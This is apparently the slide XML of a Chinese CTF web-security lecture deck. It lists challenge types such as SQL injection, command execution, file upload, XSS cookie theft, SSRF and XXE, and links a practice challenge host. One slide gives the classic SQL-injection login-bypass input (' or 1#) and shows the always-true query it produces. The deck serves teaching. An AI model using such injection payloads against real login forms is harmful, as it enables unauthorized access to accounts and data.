            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2600">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234441298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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>JSFuck</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7A9201-1831-9E4E-ABB6-BA42883B7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370" y="1810265"/>
            <a:ext cx="9258300" cy="4076700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91512542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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>JSFuck</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96DC3E76-840C-514F-80C9-D87FC729C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880" y="1644568"/>
            <a:ext cx="9174480" cy="5076339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228010104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97560" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CF4EEA5-25A6-3943-B853-95DE7CA0ACDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="838200"/>
            <a:ext cx="9159240" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>http://web.jarvisoj.com:32774/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244377944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97560" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CF4EEA5-25A6-3943-B853-95DE7CA0ACDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="838200"/>
            <a:ext cx="9159240" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>http://web.jarvisoj.com:32774/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A11F8B3-7565-8849-8096-63CDF453E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20" y="1361420"/>
            <a:ext cx="9829800" cy="5528571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427422965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2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B8DEB5-0F52-604C-8E06-F44E4891C047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1810265"/>
            <a:ext cx="8945880" cy="4540474"/>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一个存在漏洞的网站</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拿到数据库中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拿到服务器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（命令执行、文件上传）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拿到管理员的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>里（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其它的一些漏洞利用（条件竞争、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>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2240280" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>常规题目：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266215797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3749040" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>注入简介：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06C94AD-9220-304C-89BD-6B26D9194686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563880" y="1571852"/>
            <a:ext cx="4648200" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>假设有如下登录后台代码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3B788C-87A2-D943-B00C-E1C59A322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809" y="2200562"/>
            <a:ext cx="10893889" cy="4474558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2968324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3749040" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>注入简介：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06C94AD-9220-304C-89BD-6B26D9194686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1810265"/>
            <a:ext cx="7711440" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如果用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1#</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，密码为空则查询语句变为</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D76C15-2CC8-644E-8635-573A9FD2A1A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934720" y="2567780"/>
            <a:ext cx="10607040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#</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 and pwd='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B243009-B8DE-7743-8C2F-500AA3F9777C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7650480" y="2546428"/>
            <a:ext cx="1325880" cy="4616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81404720-8134-474A-AE78-FE91D9B61E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3448405"/>
            <a:ext cx="7711440" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句永远为真，即查询结果不为空，成功登录</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="240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328900344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3749040" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
